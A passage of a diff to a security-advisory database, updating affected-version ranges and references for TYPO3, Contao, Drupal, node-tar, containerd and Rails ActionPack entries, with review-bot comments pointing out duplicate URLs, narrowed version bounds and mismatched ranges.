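Review bot: The four `drupal/core` entries include a `7.0.0`–`7.80` range, but as far as I know `drupal/core` is only published on Packagist from 8.x (Drupal 7 ships as `drupal/drupal`), so that entry likely matches no real version and merely duplicates the `drupal/drupal` 7.x range added below it; please confirm against Packagist before merging and drop it if so. The 8.9.16 / 9.0.14 / 9.1.9 fixed versions appear to correspond to the CKEditor 4.16.1 release referenced in the next hunk, but that correspondence is not recorded anywhere in the file — a Drupal security-advisory URL among the references would let a reader verify the Drupal-side fix versions directly.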
@@ -44,6 +196,14 @@ "type": "WEB", "url": "https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2021-33829.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2021-33829.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/ckeditor/ckeditor4" diff --git a/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json b/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json index 014a3fb43efe4..04d31d94db950 100644 --- a/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json +++ b/advisories/github-reviewed/2021/07/GHSA-34fr-fhqr-7235/GHSA-34fr-fhqr-7235.json @@ -109,6 +109,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ 
@@ -128,6 +185,14 @@ "type": "WEB", "url": "https://github.com/TYPO3/typo3/commit/0b4950163b8919451964133febc65bcdfcec721c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32767.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32767.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json b/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json index d9474dc9001c3..6da21e6f03693 100644 --- a/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json +++ b/advisories/github-reviewed/2021/07/GHSA-6mh3-j5r5-2379/GHSA-6mh3-j5r5-2379.json @@ -89,10 +89,64 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "< 11.3.0" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ 
@@ -108,6 +162,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32668" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32668.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32668.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" diff --git a/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json b/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json index 35d1457e4d0d3..bd6157843527b 100644 --- a/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json +++ b/advisories/github-reviewed/2021/07/GHSA-8mq9-fqv8-59wf/GHSA-8mq9-fqv8-59wf.json @@ -71,6 +71,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -86,6 +143,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32667" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32667.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32667.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3/typo3" 
diff --git a/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json b/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json index 1bdd695f616e6..47af27ab55aa4 100644 --- a/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json +++ b/advisories/github-reviewed/2021/07/GHSA-c72p-9xmj-rx3w/GHSA-c72p-9xmj-rx3w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c72p-9xmj-rx3w", - "modified": "2023-04-03T22:38:53Z", + "modified": "2024-01-31T15:31:56Z", "published": "2021-07-26T21:17:45Z", "aliases": [ "CVE-2021-32760" @@ -83,9 +83,17 @@ "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.5.4" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDMNDPJJTP3J5GOEDB66F6MGXUTRG3Y3/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" } ], "database_specific": { diff --git a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json index c9d2cc9cad301..449e87c9f3330 100644 --- a/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json +++ b/advisories/github-reviewed/2021/07/GHSA-h58v-c6rf-g9f7/GHSA-h58v-c6rf-g9f7.json 
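Review bot: The Fedora reference added in the `@@ -83,9 +83,17 @@` hunk is the same announcement URL as the existing context line immediately below it, differing only in whether the `@` in `package-announce@lists.fedoraproject.org` is percent-encoded as `%40`; the new `%40` form is a duplicate and one of the two should go. Whichever encoding the repository normalises to should then be used consistently: the PHPMailer references added in the `@@ -45,10 +48,26 @@` hunk of GHSA-77mr-wc79-m8j3 use `%40`, while the existing GHSA-7q44-r25x-wm4q entry keeps `@`. The `security.gentoo.org/glsa/202401-31` addition is fine.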
@@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.10.0" + }, + { + "fixed": "4.11.5" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35210.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35210.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/contao/contao" diff --git a/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json b/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json index ba81555bb6396..5ad8b2bc21a79 100644 --- a/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json +++ b/advisories/github-reviewed/2021/07/GHSA-rgcg-28xm-8mmw/GHSA-rgcg-28xm-8mmw.json 
@@ -90,6 +90,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.18" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.3.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.28" + } + ] + } + ] } ], "references": [ @@ -101,6 +158,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32669" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32669.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32669.yaml" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-011" diff --git a/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json b/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json index 06aedbe1ecb01..abef02b3cda1e 100644 --- a/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json +++ b/advisories/github-reviewed/2021/08/GHSA-2rqw-v265-jf8c/GHSA-2rqw-v265-jf8c.json 
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2rqw-v265-jf8c", - "modified": "2023-07-03T22:56:34Z", + "modified": "2024-02-02T16:47:01Z", "published": "2021-08-26T20:36:51Z", "aliases": [ "CVE-2021-22942" ], "summary": "Open Redirect in ActionPack", - "details": "# Overview\n\nThere is a possible open redirect vulnerability in the Host Authorization\nmiddleware in Action Pack. This vulnerability has been assigned the CVE\nidentifier CVE-2021-22942.\n\nVersions Affected: >= 6.0.0.\nNot affected: < 6.0.0\nFixed Versions: 6.1.4.1, 6.0.4.1\n\n# Impact\n\nSpecially crafted “X-Forwarded-Host” headers in combination with certain\n“allowed host” formats can cause the Host Authorization middleware in\nAction Pack to redirect users to a malicious website.\n\nImpacted applications will have allowed hosts with a leading dot.\nFor example, configuration files that look like this:\n\n```ruby\nconfig.hosts << '.EXAMPLE.com'\n```\n\nWhen an allowed host contains a leading dot, a specially crafted\nHost header can be used to redirect to a malicious website.\n\nThis vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not\ntake in to account domain name case sensitivity.\n\n# Releases\n\nThe fixed releases are available at the normal locations.\n\n# Workarounds\n\nIn the case a patch can’t be applied, the following monkey patch can be\nused in an initializer:\n\n```ruby\nmodule ActionDispatch\n class HostAuthorization\n HOSTNAME = /[a-z0-9.-]+|\\[[a-f0-9]*:[a-f0-9.:]+\\]/i\n VALID_ORIGIN_HOST = /\\A(#{HOSTNAME})(?::\\d+)?\\z/\n VALID_FORWARDED_HOST = /(?:\\A|,[ ]?)(#{HOSTNAME})(?::\\d+)?\\z/\n\n private\n def authorized?(request)\n origin_host =\n request.get_header(\"HTTP_HOST\")&.slice(VALID_ORIGIN_HOST, 1) || \"\"\n forwarded_host =\n request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || \"\"\n @permissions.allows?(origin_host) &&\n (forwarded_host.blank? 
|| @permissions.allows?(forwarded_host))\n end\n end\nend\n```\n", + "details": "# Overview\n\nThere is a possible open redirect vulnerability in the Host Authorization middleware in Action Pack. This vulnerability has been assigned the CVE identifier CVE-2021-22942.\n\nVersions Affected: >= 6.0.0.\nNot affected: < 6.0.0\nFixed Versions: 6.1.4.1, 6.0.4.1\n\n# Impact\n\nSpecially crafted “X-Forwarded-Host” headers in combination with certain “allowed host” formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.\n\nImpacted applications will have allowed hosts with a leading dot. For example, configuration files that look like this:\n\n```ruby\nconfig.hosts << '.EXAMPLE.com'\n```\n\nWhen an allowed host contains a leading dot, a specially crafted Host header can be used to redirect to a malicious website.\n\nThis vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not take in to account domain name case sensitivity.\n\n# Releases\n\nThe fixed releases are available at the normal locations.\n\n# Workarounds\n\nIn the case a patch can’t be applied, the following monkey patch can be used in an initializer:\n\n```ruby\nmodule ActionDispatch\n class HostAuthorization\n HOSTNAME = /[a-z0-9.-]+|\\[[a-f0-9]*:[a-f0-9.:]+\\]/i\n VALID_ORIGIN_HOST = /\\A(#{HOSTNAME})(?::\\d+)?\\z/\n VALID_FORWARDED_HOST = /(?:\\A|,[ ]?)(#{HOSTNAME})(?::\\d+)?\\z/\n\n private\n def authorized?(request)\n origin_host =\n request.get_header(\"HTTP_HOST\")&.slice(VALID_ORIGIN_HOST, 1) || \"\"\n forwarded_host =\n request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || \"\"\n @permissions.allows?(origin_host) &&\n (forwarded_host.blank? || @permissions.allows?(forwarded_host))\n end\n end\nend\n```\n", "severity": [ { "type": "CVSS_V3", @@ -71,7 +71,7 @@ }, { "type": "PACKAGE", - "url": "https://github.com/rails/rails/tree/main/actionpack" + "url": "https://github.com/rails/rails" }, { "type": "WEB", 
@@ -85,6 +85,10 @@
 "type": "WEB",
 "url": "https://rubygems.org/gems/actionpack"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240202-0005/"
+ },
 {
 "type": "WEB",
 "url": "https://weblog.rubyonrails.org/2021/8/19/Rails-6-0-4-1-and-6-1-4-1-have-been-released/"
diff --git a/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json b/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json
index f253cfda7d5d6..71258b369b78a 100644
--- a/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json
+++ b/advisories/github-reviewed/2021/08/GHSA-9r2w-394v-53qc/GHSA-9r2w-394v-53qc.json
@@ -30,7 +30,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "3.0.0"
 },
 {
 "fixed": "4.4.16"
diff --git a/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json b/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json
index e1149d75b685c..12e34842b5f3f 100644
--- a/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json
+++ b/advisories/github-reviewed/2021/08/GHSA-c5c9-8c6m-727v/GHSA-c5c9-8c6m-727v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c5c9-8c6m-727v",
- "modified": "2021-10-21T13:56:39Z",
+ "modified": "2024-02-07T18:51:52Z",
 "published": "2021-08-19T15:53:12Z",
 "aliases": [
 "CVE-2021-32768"
@@ -32,10 +32,7 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 7.6.52"
- }
+ ]
 },
 {
 "package": {
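Review bot: Narrowing `introduced` from `0` to `3.0.0` for the range fixed in 4.4.16 stops flagging node-tar 2.x and earlier, which the old record covered; unless a source states those releases are unaffected, this silently de-scopes old versions that are still installed as transitive dependencies. The same narrowing appears in the GHSA-qq89-hq3f-393p hunk on L80 (range fixed in 4.4.18) and, for silverstripe/graphql, in GHSA-r7rh-g777-g5gx on L91, where `3.0.0` may well be the first release with the affected code but nothing in the diff says so. If the intent is only that no release below 3.0.0 exists, `"introduced": "0"` remains the safer lower bound for OSV consumers.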
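Review bot: Dropping `database_specific.last_known_affected_version_range` (`<= 7.6.52`) is only safe if this entry's `events` already carry a `fixed` event, and those events lie outside the hunk; no earlier hunk in this file touches them. If the range had only an `introduced` event, the entry now reads as affected with no upper bound. The same removal is made in the four hunks on L77 (`<= 8.7.41`, `<= 9.5.28`, `<= 10.4.18`, `<= 11.3.1`), while the typo3/cms ranges added there do carry `fixed` events (`7.6.53`, `8.7.42`, `9.5.29`), so the existing typo3/cms-core entries should be checked for the matching `fixed` values before the hint is removed.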
@@ -54,10 +51,45 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 8.7.41"
- }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.0.0"
+ },
+ {
+ "fixed": "10.4.19"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.0.0"
+ },
+ {
+ "fixed": "11.3.2"
+ }
+ ]
+ }
+ ]
 },
 {
 "package": {
@@ -76,15 +108,12 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 9.5.28"
- }
+ ]
 },
 {
 "package": {
 "ecosystem": "Packagist",
- "name": "typo3/cms-core"
+ "name": "typo3/cms"
 },
 "ranges": [
 {
@@ -98,15 +127,12 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 10.4.18"
- }
+ ]
 },
 {
 "package": {
 "ecosystem": "Packagist",
- "name": "typo3/cms-core"
+ "name": "typo3/cms"
 },
 "ranges": [
 {
@@ -120,10 +146,64 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 11.3.1"
- }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "9.0.0"
+ },
+ {
+ "fixed": "9.5.29"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.7.42"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.0.0"
+ },
+ {
+ "fixed": "7.6.53"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -139,6 +219,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32768"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-32768.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-32768.yaml"
+ },
 {
 "type": "WEB",
 "url": "https://typo3.org/security/advisory/typo3-core-sa-2021-013"
diff --git a/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json b/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json
index ffb200dd6cb3f..8e6467f17095f 100644
--- a/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json
+++ b/advisories/github-reviewed/2021/08/GHSA-hq5m-mqmx-fw6m/GHSA-hq5m-mqmx-fw6m.json
@@ -71,6 +71,63 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0"
+ },
+ {
+ "fixed": "4.4.56"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.5.0"
+ },
+ {
+ "fixed": "4.9.18"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.10.0"
+ },
+ {
+ "fixed": "4.11.7"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -86,6 +143,14 @@
 "type": "WEB",
 "url": "https://contao.org/en/security-advisories/privilege-escalation-with-the-form-generator.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-37627.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-37627.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/contao/contao"
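Review bot: The new `contao/contao` ranges start at `4.5.0` and `4.10.0`, but the existing `contao/core-bundle` entries for this advisory are outside the hunk and no hunk in this file adjusts them; if they still start at `4.9.0` and `4.11.0`, the two package names now disagree on which 4.x branches are affected. The GHSA-hr3h-x6gq-rqcp hunks on L79 make exactly that adjustment (`4.9.0` → `4.5.0`, `4.11.0` → `4.10.0`) next to the same contao/contao additions, so the core-bundle bounds here and in GHSA-r6mv-ppjc-4hgr on L81 should be checked for the same mismatch.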
diff --git a/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json b/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json
index ea54cfc14d5c6..4c7390e3811e9 100644
--- a/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json
+++ b/advisories/github-reviewed/2021/08/GHSA-hr3h-x6gq-rqcp/GHSA-hr3h-x6gq-rqcp.json
@@ -34,6 +34,63 @@
 }
 ]
 },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0"
+ },
+ {
+ "fixed": "4.4.56"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.5.0"
+ },
+ {
+ "fixed": "4.9.18"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.10.0"
+ },
+ {
+ "fixed": "4.11.7"
+ }
+ ]
+ }
+ ]
+ },
 {
 "package": {
 "ecosystem": "Packagist",
@@ -44,7 +101,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "4.9.0"
+ "introduced": "4.5.0"
 },
 {
 "fixed": "4.9.18"
@@ -63,7 +120,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "4.11.0"
+ "introduced": "4.10.0"
 },
 {
 "fixed": "4.11.7"
@@ -86,6 +143,18 @@
 "type": "WEB",
 "url": "https://contao.org/en/news/contao-4-9-16-and-4-11-5-are-available.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://contao.org/en/security-advisories/cross-site-scripting-via-html-attributes-in-the-back-end.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35955.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35955.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/contao/contao"
diff --git a/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json b/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json
index 418ddc9bb5a99..c8fbcdd49aa7c 100644
--- a/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json
+++ b/advisories/github-reviewed/2021/08/GHSA-qq89-hq3f-393p/GHSA-qq89-hq3f-393p.json
@@ -30,7 +30,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "3.0.0"
 },
 {
 "fixed": "4.4.18"
@@ -101,6 +101,14 @@
 "type": "WEB",
 "url": "https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455"
@@ -109,6 +117,10 @@
 "type": "WEB",
 "url": "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1"
+ },
 {
 "type": "WEB",
 "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
diff --git a/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json b/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json
index b8d739855b659..81698fbd35d7c 100644
--- a/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json
+++ b/advisories/github-reviewed/2021/08/GHSA-r6mv-ppjc-4hgr/GHSA-r6mv-ppjc-4hgr.json
@@ -71,6 +71,63 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0"
+ },
+ {
+ "fixed": "4.4.56"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.5.0"
+ },
+ {
+ "fixed": "4.9.18"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "contao/contao"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.10.0"
+ },
+ {
+ "fixed": "4.11.7"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -86,6 +143,14 @@
 "type": "WEB",
 "url": "https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags.html"
 },
+ {
+ "type": "WEB",
